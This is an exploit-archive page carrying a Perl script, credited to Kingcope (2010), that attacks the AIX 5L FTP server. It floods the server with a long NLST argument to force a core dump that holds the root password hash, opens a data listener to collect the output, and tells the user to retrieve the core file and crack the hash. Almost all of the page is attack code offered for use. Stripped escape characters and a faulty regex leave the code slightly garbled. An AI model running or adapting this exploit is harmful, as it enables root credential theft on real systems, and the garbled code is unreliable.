AIX5l with FTP-Server Remote Root Hash Disclosure Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : AIX5l with FTP-Server Remote Root Hash Disclosure Exploit
# Published : 2010-07-18
# Author : Kingcope
# Previous Title : Avant Browser v11.7 build 45 Clickjacking Vulnerability
# Next Title : rpc.pcnfsd Remote Format String Exploit

### AIXCOREDUMP.PL ---
### --== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--
### CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd
### THE RESULT FILE IS SCRAMBLED - SEEK FOR DES LOOKING CRYPTO KEYS
### SUCCESSFULLY TESTED ON IBM AIX 5.1
### DISCOVERED & EXPLOITED BY KINGCOPE
### JULY 2010

use IO::Socket;

$|=1;

print "--== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--n";
print "CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwdn";
print "BY KINGCOPEn";
print "JULY 2010nn";

if ($#ARGV < 1) {
	print "USAGE: ./AIXCOREDUMP.PL <target address> <your ip> [username] [password]n";
	print "SAMPLES:n";
	print "YOU HAVE A LOGIN ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25 kcope passwdn";
	print "USE GUEST ACCOUNT - NEEDS WRITE ACCESS IN /PUB ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25n";
	exit;
}

$trgt = $ARGV[0];

$sock = IO::Socket::INET->new(PeerAddr => $trgt,
                              PeerPort => '21',
                              Proto    => 'tcp');
srand(time()); 
$port = int(rand(31337-1022)) + 1025; 
$locip = $ARGV[1]; 
$locip =~ s/./,/gi;                               

if ($ARGV[2] eq "") {
	$user = "ftp";	
	$pass = "c0deb4b3@roothash.com";
} else {
	$user = $ARGV[2];
	$passwd = $ARGV[3];	
}
                        
$x = <$sock>;
print "*AIX EXPLOIT* REMOTE FTPD: $xn";
if (fork()) {
for ($k=0;$k<3;$k++) {
print "*AIX EXPLOIT* POLLUTING FTPD***n";
print "t$x";
print $sock "USER rootrn";
$x = <$sock>;
print "t$x";
print $sock "PASS sexyrn";
$x = <$sock>;
print "t$x";
}

print "*AIX EXPLOIT* ACCESSING FOLDER***n";
print $sock "USER $userrn";
$x = <$sock>;
print "t$x";
print $sock "PASS $passwdrn";
$x = <$sock>;
print "t$x";

if ($ARGV[2] eq "") {
print "*AIX EXPLOIT* CWD TO PUB***n";
print $sock "CWD pubrn";
$x = <$sock>;
print "t$x";
}

print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "rn"; 
$x = <$sock>; 
print "t$x";

print "*AIX EXPLOIT* TRIGGERING COREDUMP***n";
print $sock "NLST ~" . "A" x 5000 . "rn";
$x = <$sock>;

while(<$sock>) {
	print;
}

print "*AIX EXPLOIT* (SUCCESS)***n*AIX EXPLOIT* NOW RETRIEVE THE core FILE WITH YOUR FAVOURITE CLIENT AND LOOKUP THE R00T HASH++CRACKIT!***n";
exit;
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1); 
die "Could not create socket: $!n" unless $servsock; 
my $new_sock = $servsock->accept(); 
while(<$new_sock>) { 
print $_; 
} 
close($servsock); 	
}
## CHEERIO!